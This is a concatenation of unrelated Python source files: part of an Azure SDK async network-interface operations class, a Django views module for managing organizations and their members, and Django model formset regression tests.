:type virtualmachine_index: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'} # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceListResult"]:
"""Gets all network interfaces in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'} # type: ignore
async def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterface":
"""Get the specified network interface in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_virtual_machine_scale_set_ip_configurations(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> AsyncIterable["_models.NetworkInterfaceIPConfigurationListResult"]:
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_ip_configurations.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_ip_configurations.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations'} # type: ignore
async def get_virtual_machine_scale_set_ip_configuration(
self,
resource_group_name: str,
virtual_machine_scale_set_name: str,
virtualmachine_index: str,
network_interface_name: str,
ip_configuration_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.NetworkInterfaceIPConfiguration":
"""Get the specified network interface ip configuration in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param ip_configuration_name: The name of the ip configuration.
:type ip_configuration_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterfaceIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_07_01.models.NetworkInterfaceIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkInterfaceIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get_virtual_machine_scale_set_ip_configuration.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'ipConfigurationName': self._serialize.url("ip_configuration_name", ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterfaceIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_ip_configuration.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}/ipConfigurations/{ipConfigurationName}'} # type: ignore
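# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the generated operations class): how a
# caller might drive the two call styles above -- the AsyncLROPoller returned
# by begin_get_effective_route_table() and the AsyncItemPaged iterator
# returned by list_virtual_machine_scale_set_vm_network_interfaces(). The
# resource names and the credential/client wiring are illustrative
# assumptions, not values taken from this module.
# ---------------------------------------------------------------------------
async def _example_network_interface_calls():
    from azure.identity.aio import DefaultAzureCredential
    from azure.mgmt.network.aio import NetworkManagementClient

    credential = DefaultAzureCredential()
    async with NetworkManagementClient(credential, "<subscription-id>") as client:
        # Long-running operation: begin_*() returns a poller; await result() for
        # the deserialized EffectiveRouteListResult.
        poller = await client.network_interfaces.begin_get_effective_route_table(
            resource_group_name="example-rg",      # assumed resource group
            network_interface_name="example-nic",  # assumed NIC name
        )
        routes = await poller.result()

        # Paged operation: the method is not a coroutine; it returns an
        # AsyncItemPaged that is consumed with ``async for``.
        nic_names = []
        async for nic in client.network_interfaces.list_virtual_machine_scale_set_vm_network_interfaces(
            resource_group_name="example-rg",
            virtual_machine_scale_set_name="example-vmss",
            virtualmachine_index="0",
        ):
            nic_names.append(nic.name)

        return routes, nic_names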
|
|
import json
from bson import ObjectId
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render_to_response, get_object_or_404
from django.template import RequestContext
from django.views.decorators.http import require_POST, require_GET
from backend.db import db
from repos.forms import NewRepoForm
from repos.models import Repository
from .forms import NewOrganizationForm
from .models import Organization, OrganizationUser
@login_required
def organization_new( request ):
user = request.user
if request.method == 'POST':
form = NewOrganizationForm( request.POST )
if form.is_valid():
new_org = Organization( name=form.cleaned_data[ 'name' ],
gravatar=form.cleaned_data[ 'gravatar' ],
owner=user )
new_org.save()
new_org_user = OrganizationUser( user=user,
organization=new_org )
new_org_user.is_admin = True
new_org_user.pending = False
new_org_user.save()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
else:
form = NewOrganizationForm()
return render_to_response( 'organization_new.html', { 'form': form },
context_instance=RequestContext(request) )
@login_required
def organization_delete( request, org ):
user = request.user
org = get_object_or_404( Organization, name=org )
if org.has_user( user ):
# Delete any repos associated with this organization
repos = db.survey.find( { 'org': org.id } )
repos = [ repo[ '_id' ] for repo in repos ]
db.survey.remove( { '_id': { '$in': repos } } )
db.data.remove( { 'repo': { '$in': repos } } )
# Delete all the org user objects under this org
org_users = OrganizationUser.objects.filter( organization=org )
for org_user in org_users:
org_user.delete()
# Delete the main org object
org.delete()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
@login_required
def organization_dashboard( request, org ):
account = get_object_or_404( Organization, name=org )
is_owner = request.user == account.owner
is_member = OrganizationUser.objects.filter( organization=account,
user=request.user ).exists()
repos = Repository.objects.filter( org=account )
members = OrganizationUser.objects.filter( organization=account )
return render_to_response( 'organization_dashboard.html',
{ 'account': account,
'members': members,
'is_owner': is_owner,
'is_member': is_member,
'repos': repos },
context_instance=RequestContext(request) )
@login_required
def organization_repo_new( request, org ):
'''
Create a new data repository under <org>.
'''
org = get_object_or_404( Organization, name=org )
if request.method == 'POST':
form = NewRepoForm( request.POST,
request.FILES,
user=request.user,
org=org )
# Check for a valid XForm and parse the file!
if form.is_valid():
repo = form.save()
return HttpResponseRedirect( reverse( 'organization_dashboard',
kwargs={ 'org': org.name } ))
else:
form = NewRepoForm()
return render_to_response( 'new.html', { 'form': form },
context_instance=RequestContext(request) )
@login_required
@require_POST
def organization_member_add( request, org, user ):
'''
    Invite a user to become a member of an organization (creates a pending membership).
'''
org = get_object_or_404( Organization, name=org )
user = get_object_or_404( User, username=user )
org_user = get_object_or_404( OrganizationUser,
user=request.user,
organization=org )
# Check that the current user is the owner of the org or is an admin
response = { 'success': False }
# Don't add users who are already members
res = OrganizationUser.objects.filter( organization=org,
user=user )
if len( res ) == 0:
        if org.owner == request.user or org_user.is_admin:
org.add_user( user )
response[ 'success' ] = True
return HttpResponse( json.dumps( response ),
content_type='application/json' )
@login_required
@require_GET
def organization_member_accept( request, org, user ):
'''
    Accept a pending invitation to become a member of an organization.
'''
org = get_object_or_404( Organization, name=org )
user = get_object_or_404( User, username=user )
# Is the user this acceptance is for the current user?
if request.user != user:
return HttpResponse( status=404 )
# Great grab this user and toggle the pending variable
org_user = get_object_or_404( OrganizationUser,
user=user,
organization=org )
org_user.pending = False
org_user.save()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
@login_required
@require_GET
def organization_member_ignore( request, org, user ):
'''
    Ignore a pending invitation to become a member of an organization.
'''
org = get_object_or_404( Organization, name=org )
user = get_object_or_404( User, username=user )
# Is the user this acceptance is for the current user?
if request.user != user:
return HttpResponse( status=404 )
# Great grab this user and toggle the pending variable
org_user = get_object_or_404( OrganizationUser,
user=user,
organization=org )
org_user.delete()
return HttpResponseRedirect(
reverse( 'user_dashboard',
kwargs={ 'username': user.username } ) )
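# ---------------------------------------------------------------------------
# Hedged sketch (not part of this module): a urls.py that would wire up the
# views above. The patterns, URL names, and the "organizations" module path
# are assumptions inferred from the view signatures and the reverse() calls;
# only 'organization_dashboard' and 'user_dashboard' are referenced by name
# in this file, and 'user_dashboard' lives in another app.
#
#   from django.conf.urls import url
#   from organizations import views
#
#   urlpatterns = [
#       url(r'^new/$', views.organization_new, name='organization_new'),
#       url(r'^(?P<org>[\w-]+)/$', views.organization_dashboard,
#           name='organization_dashboard'),
#       url(r'^(?P<org>[\w-]+)/delete/$', views.organization_delete,
#           name='organization_delete'),
#       url(r'^(?P<org>[\w-]+)/repo/new/$', views.organization_repo_new,
#           name='organization_repo_new'),
#       url(r'^(?P<org>[\w-]+)/members/add/(?P<user>[\w-]+)/$',
#           views.organization_member_add, name='organization_member_add'),
#       url(r'^(?P<org>[\w-]+)/members/accept/(?P<user>[\w-]+)/$',
#           views.organization_member_accept, name='organization_member_accept'),
#       url(r'^(?P<org>[\w-]+)/members/ignore/(?P<user>[\w-]+)/$',
#           views.organization_member_ignore, name='organization_member_ignore'),
#   ]
# ---------------------------------------------------------------------------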
|
|
from __future__ import unicode_literals
from django import forms
from django.forms.formsets import BaseFormSet, DELETION_FIELD_NAME
from django.forms.utils import ErrorDict, ErrorList
from django.forms.models import modelform_factory, inlineformset_factory, modelformset_factory, BaseModelFormSet
from django.test import TestCase
from django.utils import six
from .models import User, UserSite, Restaurant, Manager, Network, Host
class InlineFormsetTests(TestCase):
def test_formset_over_to_field(self):
"A formset over a ForeignKey with a to_field can be saved. Regression for #10243"
Form = modelform_factory(User, fields="__all__")
FormSet = inlineformset_factory(User, UserSite, fields="__all__")
# Instantiate the Form and FormSet to prove
# you can create a form with no data
form = Form()
form_set = FormSet(instance=User())
# Now create a new User and UserSite instance
data = {
'serial': '1',
'username': 'apollo13',
'usersite_set-TOTAL_FORMS': '1',
'usersite_set-INITIAL_FORMS': '0',
'usersite_set-MAX_NUM_FORMS': '0',
'usersite_set-0-data': '10',
'usersite_set-0-user': 'apollo13'
}
user = User()
form = Form(data)
if form.is_valid():
user = form.save()
else:
            self.fail('Errors found on form:%s' % form.errors)
form_set = FormSet(data, instance=user)
if form_set.is_valid():
form_set.save()
usersite = UserSite.objects.all().values()
self.assertEqual(usersite[0]['data'], 10)
self.assertEqual(usersite[0]['user_id'], 'apollo13')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now update the UserSite instance
data = {
'usersite_set-TOTAL_FORMS': '1',
'usersite_set-INITIAL_FORMS': '1',
'usersite_set-MAX_NUM_FORMS': '0',
'usersite_set-0-id': six.text_type(usersite[0]['id']),
'usersite_set-0-data': '11',
'usersite_set-0-user': 'apollo13'
}
form_set = FormSet(data, instance=user)
if form_set.is_valid():
form_set.save()
usersite = UserSite.objects.all().values()
self.assertEqual(usersite[0]['data'], 11)
self.assertEqual(usersite[0]['user_id'], 'apollo13')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now add a new UserSite instance
data = {
'usersite_set-TOTAL_FORMS': '2',
'usersite_set-INITIAL_FORMS': '1',
'usersite_set-MAX_NUM_FORMS': '0',
'usersite_set-0-id': six.text_type(usersite[0]['id']),
'usersite_set-0-data': '11',
'usersite_set-0-user': 'apollo13',
'usersite_set-1-data': '42',
'usersite_set-1-user': 'apollo13'
}
form_set = FormSet(data, instance=user)
if form_set.is_valid():
form_set.save()
usersite = UserSite.objects.all().values().order_by('data')
self.assertEqual(usersite[0]['data'], 11)
self.assertEqual(usersite[0]['user_id'], 'apollo13')
self.assertEqual(usersite[1]['data'], 42)
self.assertEqual(usersite[1]['user_id'], 'apollo13')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
def test_formset_over_inherited_model(self):
"A formset over a ForeignKey with a to_field can be saved. Regression for #11120"
Form = modelform_factory(Restaurant, fields="__all__")
FormSet = inlineformset_factory(Restaurant, Manager, fields="__all__")
# Instantiate the Form and FormSet to prove
# you can create a form with no data
form = Form()
form_set = FormSet(instance=Restaurant())
# Now create a new Restaurant and Manager instance
data = {
'name': "Guido's House of Pasta",
'manager_set-TOTAL_FORMS': '1',
'manager_set-INITIAL_FORMS': '0',
'manager_set-MAX_NUM_FORMS': '0',
'manager_set-0-name': 'Guido Van Rossum'
}
        restaurant = Restaurant()
form = Form(data)
if form.is_valid():
restaurant = form.save()
else:
            self.fail('Errors found on form:%s' % form.errors)
form_set = FormSet(data, instance=restaurant)
if form_set.is_valid():
form_set.save()
manager = Manager.objects.all().values()
self.assertEqual(manager[0]['name'], 'Guido Van Rossum')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now update the Manager instance
data = {
'manager_set-TOTAL_FORMS': '1',
'manager_set-INITIAL_FORMS': '1',
'manager_set-MAX_NUM_FORMS': '0',
'manager_set-0-id': six.text_type(manager[0]['id']),
'manager_set-0-name': 'Terry Gilliam'
}
form_set = FormSet(data, instance=restaurant)
if form_set.is_valid():
form_set.save()
manager = Manager.objects.all().values()
self.assertEqual(manager[0]['name'], 'Terry Gilliam')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
# Now add a new Manager instance
data = {
'manager_set-TOTAL_FORMS': '2',
'manager_set-INITIAL_FORMS': '1',
'manager_set-MAX_NUM_FORMS': '0',
'manager_set-0-id': six.text_type(manager[0]['id']),
'manager_set-0-name': 'Terry Gilliam',
'manager_set-1-name': 'John Cleese'
}
form_set = FormSet(data, instance=restaurant)
if form_set.is_valid():
form_set.save()
manager = Manager.objects.all().values().order_by('name')
self.assertEqual(manager[0]['name'], 'John Cleese')
self.assertEqual(manager[1]['name'], 'Terry Gilliam')
else:
self.fail('Errors found on formset:%s' % form_set.errors)
def test_formset_with_none_instance(self):
"A formset with instance=None can be created. Regression for #11872"
Form = modelform_factory(User, fields="__all__")
FormSet = inlineformset_factory(User, UserSite, fields="__all__")
# Instantiate the Form and FormSet to prove
# you can create a formset with an instance of None
form = Form(instance=None)
formset = FormSet(instance=None)
def test_empty_fields_on_modelformset(self):
"No fields passed to modelformset_factory should result in no fields on returned forms except for the id. See #14119."
UserFormSet = modelformset_factory(User, fields=())
formset = UserFormSet()
for form in formset.forms:
self.assertTrue('id' in form.fields)
self.assertEqual(len(form.fields), 1)
def test_save_as_new_with_new_inlines(self):
"""
Existing and new inlines are saved with save_as_new.
Regression for #14938.
"""
efnet = Network.objects.create(name="EFNet")
host1 = Host.objects.create(hostname="irc.he.net", network=efnet)
HostFormSet = inlineformset_factory(Network, Host, fields="__all__")
# Add a new host, modify previous host, and save-as-new
data = {
'host_set-TOTAL_FORMS': '2',
'host_set-INITIAL_FORMS': '1',
'host_set-MAX_NUM_FORMS': '0',
'host_set-0-id': six.text_type(host1.id),
'host_set-0-hostname': 'tranquility.hub.dal.net',
'host_set-1-hostname': 'matrix.de.eu.dal.net'
}
        # To save a formset as new, it needs a new parent Network instance
dalnet = Network.objects.create(name="DALnet")
formset = HostFormSet(data, instance=dalnet, save_as_new=True)
self.assertTrue(formset.is_valid())
formset.save()
self.assertQuerysetEqual(
dalnet.host_set.order_by("hostname"),
["<Host: matrix.de.eu.dal.net>", "<Host: tranquility.hub.dal.net>"]
)
def test_initial_data(self):
user = User.objects.create(username="bibi", serial=1)
UserSite.objects.create(user=user, data=7)
FormSet = inlineformset_factory(User, UserSite, extra=2, fields="__all__")
formset = FormSet(instance=user, initial=[{'data': 41}, {'data': 42}])
self.assertEqual(formset.forms[0].initial['data'], 7)
self.assertEqual(formset.extra_forms[0].initial['data'], 41)
self.assertTrue('value="42"' in formset.extra_forms[1].as_p())
class FormsetTests(TestCase):
def test_error_class(self):
'''
Test the type of Formset and Form error attributes
'''
Formset = modelformset_factory(User, fields="__all__")
data = {
'form-TOTAL_FORMS': '2',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
'form-0-id': '',
'form-0-username': 'apollo13',
'form-0-serial': '1',
'form-1-id': '',
'form-1-username': 'apollo13',
'form-1-serial': '2',
}
formset = Formset(data)
# check if the returned error classes are correct
# note: formset.errors returns a list as documented
self.assertIsInstance(formset.errors, list)
self.assertIsInstance(formset.non_form_errors(), ErrorList)
for form in formset.forms:
self.assertIsInstance(form.errors, ErrorDict)
self.assertIsInstance(form.non_field_errors(), ErrorList)
def test_initial_data(self):
User.objects.create(username="bibi", serial=1)
Formset = modelformset_factory(User, fields="__all__", extra=2)
formset = Formset(initial=[{'username': 'apollo11'}, {'username': 'apollo12'}])
self.assertEqual(formset.forms[0].initial['username'], "bibi")
self.assertEqual(formset.extra_forms[0].initial['username'], "apollo11")
self.assertTrue('value="apollo12"' in formset.extra_forms[1].as_p())
def test_extraneous_query_is_not_run(self):
Formset = modelformset_factory(Network, fields="__all__")
data = {'test-TOTAL_FORMS': '1',
'test-INITIAL_FORMS': '0',
'test-MAX_NUM_FORMS': '',
'test-0-name': 'Random Place', }
with self.assertNumQueries(1):
formset = Formset(data, prefix="test")
formset.save()
class CustomWidget(forms.widgets.TextInput):
pass
class UserSiteForm(forms.ModelForm):
class Meta:
model = UserSite
fields = "__all__"
widgets = {
'id': CustomWidget,
'data': CustomWidget,
}
localized_fields = ('data',)
class Callback(object):
def __init__(self):
self.log = []
def __call__(self, db_field, **kwargs):
self.log.append((db_field, kwargs))
return db_field.formfield(**kwargs)
class FormfieldCallbackTests(TestCase):
"""
Regression for #13095 and #17683: Using base forms with widgets
defined in Meta should not raise errors and BaseModelForm should respect
the specified pk widget.
"""
def test_inlineformset_factory_default(self):
Formset = inlineformset_factory(User, UserSite, form=UserSiteForm, fields="__all__")
form = Formset().forms[0]
self.assertIsInstance(form['id'].field.widget, CustomWidget)
self.assertIsInstance(form['data'].field.widget, CustomWidget)
self.assertFalse(form.fields['id'].localize)
self.assertTrue(form.fields['data'].localize)
def test_modelformset_factory_default(self):
Formset = modelformset_factory(UserSite, form=UserSiteForm)
form = Formset().forms[0]
self.assertIsInstance(form['id'].field.widget, CustomWidget)
self.assertIsInstance(form['data'].field.widget, CustomWidget)
self.assertFalse(form.fields['id'].localize)
self.assertTrue(form.fields['data'].localize)
def assertCallbackCalled(self, callback):
id_field, user_field, data_field = UserSite._meta.fields
expected_log = [
(id_field, {'widget': CustomWidget}),
(user_field, {}),
(data_field, {'widget': CustomWidget, 'localize': True}),
]
self.assertEqual(callback.log, expected_log)
def test_inlineformset_custom_callback(self):
callback = Callback()
inlineformset_factory(User, UserSite, form=UserSiteForm,
formfield_callback=callback, fields="__all__")
self.assertCallbackCalled(callback)
def test_modelformset_custom_callback(self):
callback = Callback()
modelformset_factory(UserSite, form=UserSiteForm,
formfield_callback=callback)
self.assertCallbackCalled(callback)
class BaseCustomDeleteFormSet(BaseFormSet):
"""
A formset mix-in that lets a form decide if it's to be deleted.
Works for BaseFormSets. Also works for ModelFormSets with #14099 fixed.
form.should_delete() is called. The formset delete field is also suppressed.
"""
